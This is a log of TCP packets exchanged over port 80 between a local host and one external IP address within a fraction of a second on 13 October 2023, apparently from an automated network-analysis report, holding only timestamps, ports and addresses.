Oct 13, 2023 15:20:57.269730091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269778967 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.269859076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269900084 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.269937038 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269979954 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.269994974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270010948 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270040989 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270066977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270155907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270200968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270220041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270265102 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270298958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270343065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270343065 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270385027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270448923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270494938 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270531893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270576000 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270610094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270652056 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270674944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270720005 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270724058 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270736933 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270767927 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270793915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270847082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270895958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.270946980 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270962954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270977974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.270992994 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271020889 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271022081 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271059036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271106958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271128893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271159887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271173000 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271200895 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271209002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271250963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271254063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271296978 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271342993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271359921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271388054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271405935 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271414995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271452904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271460056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271500111 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271559954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271594048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271603107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271631002 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271637917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271682024 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271717072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271761894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271797895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271840096 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271858931 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271894932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271929026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.271965981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.271977901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272017002 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272084951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272131920 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272144079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272187948 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272207975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272252083 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272264004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272308111 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272330999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272377968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272397041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272413015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272439957 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272468090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272545099 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272588968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272591114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272631884 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272667885 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272712946 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272722960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272773027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272797108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272845984 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272861004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272900105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272908926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272919893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.272947073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272975922 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.272988081 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273036957 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273072004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273116112 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273139000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273190022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273224115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273268938 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273287058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273333073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273356915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273406982 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273441076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273458004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273488998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273509979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273520947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273571014 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273596048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273612976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273642063 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273667097 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273794889 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273838043 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273850918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273894072 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.273895025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.273937941 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274044037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.274086952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274225950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.274272919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274283886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.274319887 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274347067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.274383068 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274399996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.274452925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274534941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.274571896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274596930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.274636030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274660110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.274702072 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274719000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.274760008 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274791002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.274831057 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274848938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.274888992 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274919033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.274966002 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.274966955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275002003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275024891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275063038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275091887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275131941 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275162935 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275193930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275199890 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275233984 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275238991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275271893 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275302887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275341034 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275424957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275464058 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275495052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275526047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275536060 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275563002 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275567055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275602102 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275640011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275676012 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275718927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275755882 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275847912 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275878906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275911093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.275960922 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.275991917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276030064 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276103020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276143074 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276171923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276211023 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276279926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276315928 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276441097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276479959 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276510954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276549101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276575089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276612043 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276639938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276674032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276686907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276724100 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276747942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276763916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276787043 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276806116 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276820898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276859045 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276909113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276942968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.276952982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.276989937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277021885 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277056932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277170897 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277215958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277240038 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277275085 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277306080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277349949 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277355909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277390957 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277407885 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277453899 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277482986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277519941 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277533054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277549982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277568102 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277585030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277607918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277642965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277684927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277720928 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277750015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277798891 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277803898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277841091 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277887106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277923107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277932882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.277967930 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.277998924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278039932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278069019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278107882 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278136015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278167009 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278181076 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278202057 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278211117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278248072 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278265953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278302908 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278328896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278366089 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278387070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278424978 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278449059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278510094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278536081 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278553009 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278568983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278599024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278614998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278636932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278667927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278685093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278707027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278722048 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278848886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278889894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.278918028 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.278954983 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.279020071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.279057026 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.279082060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.279119015 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.279128075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.279159069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.279167891 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.279197931 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.279198885 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.279233932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.279275894 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.279314995 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.279344082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.279378891 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.279383898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.279418945 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.279508114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.279546022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.279588938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.279628038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.564486027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.564513922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.564544916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.564558029 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.564627886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.564627886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.564632893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.564675093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.564680099 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.564719915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.564724922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.564757109 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.564768076 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.564799070 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.564865112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.564909935 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.564918995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.564935923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.564975977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.564975977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.564996004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.565037012 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.565085888 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.565121889 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.565133095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.565167904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.565180063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.565216064 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.565258980 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.565275908 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.565298080 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.565311909 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.565385103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.565421104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.565426111 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.565455914 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.565470934 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.565517902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.565552950 CEST	80	49721	91.215.85.17	192.168.2.5
